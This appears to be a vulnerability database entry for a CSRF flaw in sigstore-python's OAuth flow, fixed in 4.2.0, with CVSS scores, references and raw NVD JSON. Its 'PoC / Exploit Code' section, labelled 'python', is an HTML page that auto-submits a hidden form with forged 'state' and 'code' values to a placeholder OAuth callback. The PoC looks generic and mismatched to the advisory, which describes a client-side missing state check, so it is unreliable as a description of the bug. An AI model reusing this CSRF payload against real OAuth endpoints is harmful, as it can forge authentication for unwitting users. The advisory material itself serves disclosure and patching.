CVE-2026-24408

Description

sigstore-python is a Python tool for generating and verifying Sigstore signatures. Prior to version 4.2.0, the sigstore-python OAuth authentication flow is susceptible to Cross-Site Request Forgery. `_OAuthSession` creates a unique "state" and sends it as a parameter in the authentication request but the "state" in the server response seems not not be cross-checked with this value. Version 4.2.0 contains a patch for the issue.

CVSS Details

CVSS Score

0.0

Severity

NONE

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:linuxfoundation:sigstore-python:*:*:*:*:*:*:*:* - VULNERABLE

sigstore-python < 4.2.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CVE-2026-24408 CSRF PoC for sigstore-python OAuth -->
<!DOCTYPE html>
<html>
<head>
    <title>Sigstore OAuth CSRF PoC</title>
</head>
<body>
    <h2>Sigstore OAuth CSRF Attack PoC</h2>
    <p>This PoC demonstrates the CSRF vulnerability in sigstore-python OAuth flow.</p>
    
    <script>
        // Malicious OAuth callback parameters
        const fakeState = 'attacker_controlled_state_' + Math.random().toString(36).substring(7);
        const fakeCode = 'attacker_obtained_authorization_code';
        
        // In real attack, this would point to sigstore-python's OAuth callback endpoint
        // The server accepts this request without validating the 'state' parameter
        const oauthCallbackUrl = 'https://sigstore-service.example.com/oauth/callback';
        
        // Auto-submit form to trigger OAuth callback with attacker-controlled parameters
        document.write(`
            <form id="csrfForm" action="${oauthCallbackUrl}" method="POST">
                <input type="hidden" name="state" value="${fakeState}" />
                <input type="hidden" name="code" value="${fakeCode}" />
            </form>
        `);
        
        // Auto-submit on page load
        window.onload = function() {
            document.getElementById('csrfForm').submit();
        };
    </script>
    
    <noscript>
        <form id="csrfForm" action="https://sigstore-service.example.com/oauth/callback" method="POST">
            <input type="hidden" name="state" value="malicious_state_value" />
            <input type="hidden" name="code" value="malicious_code" />
            <button type="submit">Click to continue</button>
        </form>
    </noscript>
</body>
</html>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-24408
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-24408
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-24408/
[4] VulDB https://vuldb.com/cve/CVE-2026-24408
[5] https://github.com/sigstore/sigstore-python/commit/5e77497fe8f0b202bdd118949074ec2f20da69aa
[6] https://github.com/sigstore/sigstore-python/releases/tag/v4.2.0
[7] https://github.com/sigstore/sigstore-python/security/advisories/GHSA-hm8f-75xx-w2vr

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-24408", "sourceIdentifier": "[email protected]", "published": "2026-01-26T23:16:08.973", "lastModified": "2026-03-02T21:19:25.777", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "sigstore-python is a Python tool for generating and verifying Sigstore signatures. Prior to version 4.2.0, the sigstore-python OAuth authentication flow is susceptible to Cross-Site Request Forgery. `_OAuthSession` creates a unique \"state\" and sends it as a parameter in the authentication request but the \"state\" in the server response seems not not be cross-checked with this value. Version 4.2.0 contains a patch for the issue."}, {"lang": "es", "value": "sigstore-python es una herramienta de Python para generar y verificar firmas de Sigstore. Antes de la versión 4.2.0, el flujo de autenticación OAuth de sigstore-python es susceptible a la falsificación de petición en sitios cruzados. `_OAuthSession` crea un 'estado' único y lo envía como parámetro en la petición de autenticación, pero el 'estado' en la respuesta del servidor parece no ser verificado con este valor. La versión 4.2.0 contiene un parche para el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:N", "baseScore": 0.0, "baseSeverity": "NONE", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 0.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.6, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:linuxfoundation:sigstore-python:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.2.0", "matchCriteriaId": "7DA3586E-04FD-4D7E-85C8-BAE152F3C9D8"}]}]}], "references": [{"url": "https://github.com/sigstore/sigstore-python/commit/5e77497fe8f0b202bdd118949074ec2f20da69aa", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/sigstore/sigstore-python/releases/tag/v4.2.0", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/sigstore/sigstore-python/security/advisories/GHSA-hm8f-75xx-w2vr", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}